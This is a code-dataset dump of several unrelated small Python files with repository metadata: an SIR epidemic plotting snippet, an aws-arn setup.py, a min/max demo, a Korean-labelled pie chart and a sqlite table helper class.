N = sum(y0)         # total population, conserved by the SIR model
argsup = [beta, gamma, N]
# Integrate the SIR system with the project's MATLAB-style ode45 port;
# extra parameters are forwarded to ode() via varargin.
sol = ode45(ode, tspan, y0, options = None, varargin = argsup)
#Plot result
fig = plt.figure()
plt.title('Epidemic problem')
plt.xlabel('time [d]')
plt.ylabel('% population')
plt.plot(sol.t,sol.y[0],label="healthy")
plt.plot(sol.t,sol.y[1],label="infected")
plt.plot(sol.t,sol.y[2],label="immune")
plt.legend()
plt.show()
"noreply@github.com"
] | armoreau.noreply@github.com |
2626cca9adae3acfe97f8e89c9fba00f989f3c44 | 35697f83f827f96a7e21d3bacbcf60f7ea21dca8 | /setup.py | 21f9dba86a89b9743f2a54439d5b87a58d0a30b7 | [
"Apache-2.0"
] | permissive | benkehoe/aws-arn | 72e43389559e8f2f24cc490c7a99130a09ed759a | 4493f0098155aa7134edc7cd8532ec786c37d6d0 | refs/heads/master | 2021-05-05T08:42:31.604130 | 2018-03-06T19:04:16 | 2018-03-06T19:04:16 | 118,985,009 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,145 | py | from setuptools import setup
def get_version(name):
    """Return the stripped contents of <name>/_version, or "0.0.0" if the
    version file does not exist."""
    import os.path
    version_file = os.path.join(name, '_version')
    if os.path.exists(version_file):
        with open(version_file) as handle:
            return handle.read().strip()
    return "0.0.0"
setup(
    name='aws-arn',
    version=get_version('aws_arn'),
    description='Create properly formatted AWS ARNs according to service rules',
    packages=["aws_arn"],
    package_data={
        "aws_arn": ["config.json", "_version"]
    },
    entry_points={
        'console_scripts': [
            'aws-arn = aws_arn:main',
        ],
    },
    author='Ben Kehoe',
    author_email='bkehoe@irobot.com',
    project_urls={
        "Source code": "https://github.com/benkehoe/aws-arn",
    },
    license='Apache Software License 2.0',
    classifiers=(
        # Fixed: 'Development Status :: 2 - Beta' is not a valid trove
        # classifier (the scale is 1-Planning, 2-Pre-Alpha, 3-Alpha,
        # 4-Beta, 5-Production/Stable); '4 - Beta' is the real Beta entry.
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Natural Language :: English',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'License :: OSI Approved :: Apache Software License',
    ),
    keywords='aws arn',
)
"bkehoe@irobot.com"
] | bkehoe@irobot.com |
8a73ad6df76b9a46ff813a6278b57e82c62c30fb | f760a5900041ec4e8bd8443d62cc8c8f8e1d5575 | /Python/minmax.py | be22372e210778f3d16e2c4dff5cffa516c71600 | [] | no_license | rawskim/gitrepo | b28ef4f1495e45afff8f55bcb097e8f86b9ca249 | 0f687ddb1e5a039647b0d73301316c155f0f8f58 | refs/heads/master | 2021-05-05T09:49:17.385294 | 2019-12-20T06:35:49 | 2019-12-20T06:35:49 | 103,913,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# minmax.py
import random
def losuj(ile, min=0, max=100):
    """Return a list of `ile` random integers drawn uniformly from [min, max].

    (Parameter names `min`/`max` shadow the builtins but are kept because
    they are part of the keyword-argument interface.)
    """
    return [random.randint(min, max) for _ in range(ile)]
def minmax(lista):
    """Return (smallest, largest) element of a non-empty list.

    Bug fix: the original called ``lista.pop(0)``, destructively removing
    the first element from the CALLER's list as a side effect.  This
    version scans without mutating.  An empty list still raises IndexError
    (same as the original's ``lista[0]``).
    """
    smallest = largest = lista[0]
    for liczba in lista[1:]:
        if liczba < smallest:
            smallest = liczba
        if liczba > largest:
            largest = liczba
    return smallest, largest
def main(args):
    """Draw 50 random values in [10, 90], print their extremes and the list."""
    values = losuj(50, 10, 90)
    lowest, highest = minmax(values)
    print("Min : {}, Max: {}".format(lowest, highest))
    print(values)
    return 0
if __name__ == '__main__':
    import sys
    # Exit status comes from main() (always 0 on normal completion).
    sys.exit(main(sys.argv))
| [
"michalrawski01@gmail.com"
] | michalrawski01@gmail.com |
54a075ef2572940304283d2f526de481af678278 | 5154364983b0e44c4af2d41a59cfa8edc923283a | /python_Source/developmentP/deeplearining/pie_chart_01.py | 00eb701184787dad7373c13e41ea294c5459683e | [] | no_license | vasana12/python_python_git | 082f84df30e4b307d223e8970f87a7432a1d80fd | db87e112731fca1fe80fef29d8f180f19b9e7afc | refs/heads/master | 2020-03-30T23:22:30.197307 | 2018-11-24T05:05:51 | 2018-11-24T05:05:51 | 151,698,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 562 | py | import matplotlib.pyplot as plt
from matplotlib import font_manager, rc
import matplotlib
font_location = "C:/Windows/fonts/malgun.ttf"
font_name = font_manager.FontProperties(fname=font_location).get_name()
matplotlib.rc('font', family=font_name)
labels = '개구리', '돼지', '개', '통나무'
sizes = [15, 30, 40, 10]
colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']
explode = (0, 0.1, 0, 0)
plt.pie(sizes, explode = explode, labels=labels, colors=colors,
autopct='%2.2f%%', shadow=False, startangle=90)
plt.axis('equal')
plt.show() | [
"wodud6349@gmail.com"
] | wodud6349@gmail.com |
8619e1328cd20bbd49f8d3ee9174091af43af082 | 08e1886591fea6ab9dcdc6cedd11a63b9bce4bba | /python/packages/db_table.py | fc7fe6ffc54a96e824289d4b967eb32f4c2a06ac | [] | no_license | liaowen9527/multi_tech | 395bcdb74887196f0eff49e4108a2420a1646e47 | cc5a4541064eeb3d5ec3055d22c1fed3d64fc446 | refs/heads/master | 2023-03-17T20:19:22.544501 | 2022-08-22T03:16:30 | 2022-08-22T03:16:30 | 154,770,399 | 0 | 0 | null | 2023-03-03T19:00:18 | 2018-10-26T03:11:59 | C++ | UTF-8 | Python | false | false | 3,454 | py | import sqlite3
from packages.nb_datetime import *
class NbDBFeled:
    """Schema descriptor for one table column.

    (The class name keeps the original 'Feled' spelling - a typo of
    'Field' - because external code may already reference it.)
    """
    def __init__(self):
        self.is_pk = False     # column is the PRIMARY KEY
        self.not_null = False  # column carries a NOT NULL constraint
        self.name = ''         # column name
        self.type = ''         # sqlite affinity: INTEGER / NUMERIC / TEXT


class NbDBTable:
    """Small helper that manages one sqlite3 table.

    The schema is inferred from sample row dicts (init_fields_by_dict) and
    the table is created lazily on first use.  Row VALUES are always bound
    through ``?`` placeholders, but table and column NAMES are interpolated
    directly into the SQL text - they must come from trusted code, never
    from user input.
    """
    def __init__(self, name=''):
        self.dbpath = ''    # path handed to sqlite3.connect()
        self.name = name    # table name
        self.fields = []    # list of NbDBFeled describing the columns
        self.conn = None    # lazily opened sqlite3.Connection

    def create_table(self):
        """Open the database and CREATE TABLE IF NOT EXISTS from self.fields."""
        conn = sqlite3.connect(self.dbpath)
        cursor = conn.cursor()
        columns = []
        for field in self.fields:
            constraint = ''
            if field.is_pk:
                constraint = ' PRIMARY KEY NOT NULL'
            elif field.not_null:
                constraint = ' NOT NULL'
            columns.append('%s %s%s' % (field.name, field.type, constraint))
        sql = 'CREATE TABLE IF NOT EXISTS %s (%s);' % (self.name, ','.join(columns))
        cursor.execute(sql)
        self.conn = conn

    def set_pk_field(self, field):
        """Mark column `field` as the primary key, creating it if unknown."""
        f = self.get_field(field)
        if f is None:
            f = NbDBFeled()
            f.name = field
            self.fields.append(f)
        f.is_pk = True

    def get_field(self, field):
        """Return the NbDBFeled named `field`, or None if not declared."""
        for f in self.fields:
            if f.name == field:
                return f
        return None

    def init_fields_by_dict(self, dict_):
        """Infer column names/types from a sample row dict.

        int -> INTEGER, float -> NUMERIC, everything else -> TEXT.
        Columns already declared (e.g. via set_pk_field) are left alone.
        """
        for key, value in dict_.items():
            if self.get_field(key) is not None:
                continue
            field = NbDBFeled()
            field.name = key
            if isinstance(value, int):
                field.type = 'INTEGER'
            elif isinstance(value, float):
                field.type = 'NUMERIC'
            else:
                field.type = 'TEXT'
            self.fields.append(field)

    def get_conn(self):
        """Return the open connection, creating the table on first call."""
        if self.conn is None:
            self.create_table()
        return self.conn

    def insert(self, dict_, commit=True):
        """Insert one row dict.

        Fix: the ``commit`` argument was previously accepted but ignored;
        it is now honoured (the default True preserves old behaviour).
        """
        conn = self.get_conn()
        self.insert_c(dict_, conn.cursor())
        if commit:
            conn.commit()

    def insert_many(self, arr):
        """Insert a sequence of row dicts in a single commit."""
        conn = self.get_conn()
        cursor = conn.cursor()
        for dict_ in arr:
            self.insert_c(dict_, cursor)
        conn.commit()

    def insert_c(self, dict_, cursor):
        """Insert one row through `cursor` without committing.

        Bug fix: the original appended every datetime value TWICE (once as
        a ms-string, once through dead string-quoting code reached after
        the datetime branch), which desynchronised the value list from the
        ``?`` placeholders and made any datetime insert fail.  The
        unreachable manual-quoting branch is gone: every value is bound
        exactly once via parameters.
        """
        names = []
        values = []
        for key, value in dict_.items():
            names.append(key)
            if isinstance(value, datetime.datetime):
                # Datetimes are stored as millisecond strings (project
                # convention via nb_datetime).
                values.append(nb_datetime.to_ms_string(value))
            else:
                values.append(value)
        placeholders = ','.join('?' * len(names))
        sql = 'INSERT INTO %s(%s) VALUES(%s)' % (self.name, ','.join(names), placeholders)
        cursor.execute(sql, values)

    def update(self, obj):
        """Not implemented yet."""
        pass

    def update_many(self, arr):
        """Not implemented yet."""
        pass

    def upset(self, obj):
        """Not implemented yet (name presumably means 'upsert')."""
        pass

    def upset_many(self, arr):
        """Not implemented yet (name presumably means 'upsert')."""
        pass

    def delete(self):
        """Not implemented yet."""
        pass

    def delete_many(self):
        """Not implemented yet."""
        pass
if __name__ == "__main__":
    # Ad-hoc smoke test: create table 'aaa' and insert one row.
    # NOTE(review): hardcoded absolute Windows path - this only runs on the
    # original author's machine; point dbpath elsewhere (or ':memory:') to
    # try it locally.
    table = NbDBTable()
    table.name = 'aaa'
    table.dbpath = r"E:\\git_code\\ng-support\\ng\\Tool\\NBSupport\\package\\data\\aa.db"
    table.set_pk_field('_id')
    dict_ = {'_id':'aaa', 'name':'liaowen', 'num': 3}
    table.init_fields_by_dict(dict_)
    table.insert(dict_)
"wen.liao@netbrain.com"
] | wen.liao@netbrain.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.